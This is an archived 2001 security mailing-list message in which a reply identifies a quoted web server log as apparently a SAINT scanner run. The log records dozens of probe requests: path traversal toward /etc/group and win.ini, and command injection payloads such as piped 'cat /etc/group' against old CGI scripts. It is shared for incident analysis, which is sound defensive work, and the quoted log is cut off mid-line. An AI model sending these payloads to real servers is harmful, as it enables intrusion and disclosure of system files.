Appears to be by SAINT, web site is www.wwdsi.com. --- jamie rishaw <jamieat_private> wrote: > Hardcore scan of our web server.. Does this look > familiar to anyone? > > [ LOG :: ] > > 69warp87.newtel.com - - [14/Aug/2001:12:56:16 -0400] > "QUIT" 501 - > 69warp87.newtel.com - - [14/Aug/2001:13:06:18 -0400] > "QUIT" 401 - > 69warp87.newtel.com - - [14/Aug/2001:13:07:35 -0400] > "GET /n0nexi5tent_fi1e.html HTTP/1.0" 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:35 -0400] > "GET /n0nexi5tent_fi1e.html HTTP/1.0" 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] > "GET / HTTP/1.0" 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] > "GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/group > HTTP/1.0" 400 371 > 69warp87.newtel.com - - [14/Aug/2001:13:07:36 -0400] > "GET > /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini > HTTP/1.0" 400 > 375 > 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] > "GET /../../../../../etc/group HTTP/1.0" 400 351 > 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] > "GET /../../../../../winnt/win.ini HTTP/1.0" 400 355 > 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] > "GET /../../../../..winnt/win.ini HTTP/1.0" 400 354 > 69warp87.newtel.com - - [14/Aug/2001:13:07:37 -0400] > "GET /.../.../.../.../.../etc/group HTTP/1.0" 401 > 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] > "GET /.../.../.../.../.../winnt/win.ini HTTP/1.0" > 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] > "GET /../../../../../etc/group HTTP/1.0" 400 351 > 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] > "GET /../../../../../winnt/win.ini HTTP/1.0" 400 355 > 69warp87.newtel.com - - [14/Aug/2001:13:07:38 -0400] > "GET > /cgi-bin/webdist.cgi?distloc=;/bin/cat%20/etc/group > HTTP/1.0" 40 > 4 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] > "GET /cgi-bin/campas?%0acat%0a/etc/group%0a > HTTP/1.0" 404 279 > 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] > "GET /cgi-bin/htmlscript?../../../../../../etc/group > HTTP/1.0" 404 28 > 3 > 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] > "GET /cgi-bin/php.cgi?/etc/group HTTP/1.0" 404 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:39 -0400] > "GET /cgi-bin/pfdispaly?../../../../../../etc/group > HTTP/1.0" 404 282 > 69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] > "GET > /cgi-bin/pfdispaly.cgi?../../../../../../etc/group > HTTP/1.0" 404 > 286 > 69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] > "GET > /cgi-bin/view-source?../../../../../../etc/group > HTTP/1.0" 404 2 > 84 > 69warp87.newtel.com - - [14/Aug/2001:13:07:40 -0400] > "GET /cgi-bin/htsearch?exclude=%60/etc/group%60 > HTTP/1.0" 404 > 281 > 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] > "GET > /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/cat%20/etc/g > roup HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] > "GET /cgi-bin/faxsurvey?/bin/cat%20/etc/group > HTTP/1.0" 404 282 > 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] > "GET /cgi-bin/counterfiglet/nc/f=;cat%20/etc/group > HTTP/1.0" 404 307 > 69warp87.newtel.com - - [14/Aug/2001:13:07:41 -0400] > "GET > /cgi-bin/calendar_admin.pl?config=|cat%20/etc/group| > HTTP/1.0" 4 > 04 290 > 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] > "GET > /cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/group| > HT > TP/1.0" 404 299 > 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] > "GET > /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/group%00 > HTTP > /1.0" 404 300 > 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] > "GET > /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/grou > p HTTP/1.0" 404 286 > 69warp87.newtel.com - - [14/Aug/2001:13:07:42 -0400] > "GET > /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../et > c/group HTTP/1.0" 404 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] > "GET /cgi-bin/htgrep?file=index.html&hdr=/etc/group > HTTP/1.0" 404 279 > 69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] > "GET > /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../.. > /../../etc/group%00 HTTP/1.0" 404 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:43 -0400] > "GET > /search97cgi/vtopic?action=view&ViewTemplate=../../../../../etc/ > group HTTP/1.0" 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] > "GET /cgi-bin/multihtml.pl?multi=/etc/group%00html > HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] > "GET /cgi-bin/query?mss=../config HTTP/1.0" 404 278 > 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] > "GET > /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group > HTTP/1.0" 40 > 0 377 > 69warp87.newtel.com - - [14/Aug/2001:13:07:44 -0400] > "GET /cgi-bin/webplus?script=/../../../../etc/group > HTTP/1.0" 404 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] > "GET > /cgi-bin/webplus.exe?script=/../../../../etc/group > HTTP/1.0" 404 > 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] > "GET > /cgi-bin/webplus.cgi?script=/../../../../etc/group > HTTP/1.0" 404 > 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:45 -0400] > "GET > /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20Content-Type > :%20text%2Fhtml%3Becho%20%20%3B%20cat%20%2Fetc%2Fgroup%00 > HTTP/1.0" 404 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] > "GET > /cgi-bin/bbs_forum.cgi?read=../../../../etc/group > HTTP/1.0" 404 > 286 > 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] > "GET > /cgi-bin/bbs/bbs_forum.cgi?read=../../../../etc/group > HTTP/1.0" > 404 290 > 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] > "GET /cgi-bin/man-cgi?%20/etc/group%20 HTTP/1.0" 404 > 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:46 -0400] > "GET /opendir.php?requesturl=/etc/group HTTP/1.0" > 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] > "GET > /bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4 > vZXRjL2dyb3VwAAo HTTP/1.0" 401 468 > 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] > "GET > /cgi-bin/talkback.cgi?article=../../../../../etc/group%00&action > =view&matchview=1 HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] > "GET > /cgi-bin/cal_make.pl?p0=../../../../../etc/group%00 > HTTP/1.0" 40 > 4 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:47 -0400] > "GET > /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/group > HTTP > /1.0" 404 292 > 69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] > "GET /cgi-bin/test-cgi HTTP/1.0" 403 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] > "GET /cgi-bin/dumpenv.pl HTTP/1.0" 404 283 > 69warp87.newtel.com - - [14/Aug/2001:13:07:48 -0400] > "GET /cgi-bin/nph-test-cgi HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:49 -0400] > "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 284 > 69warp87.newtel.com - - [14/Aug/2001:13:07:52 -0400] > "GET /cgi-bin/wwwboard.cgi HTTP/1.0" 404 285 > 69warp87.newtel.com - - [14/Aug/2001:13:07:52 -0400] > "GET /cgi-bin/wwwboard HTTP/1.0" 404 281 > 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] > "GET /cgi-bin/wrap HTTP/1.0" 404 277 > 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] > "GET /cgi-bin/wrap.pl HTTP/1.0" 404 280 > 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] > "GET /cgi-bin/wrap.cgi HTTP/1.0" 404 281 > 69warp87.newtel.com - - [14/Aug/2001:13:07:53 -0400] > "GET /cgi-bin/finger HTTP/1.0" 404 279 > 69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] > "GET /cgi-bin/finger.pl HTTP/1.0" 404 282 > 69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] > "GET /cgi-bin/finger.cgi HTTP/1.0" 404 283 > 69warp87.newtel.com - - [14/Aug/2001:13:07:54 -0400] > "GET === message truncated === __________________________________________________ Do You Yahoo!? Make international calls for as low as $.04/minute with Yahoo! Messenger http://phonecard.yahoo.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Aug 15 2001 - 09:26:43 PDT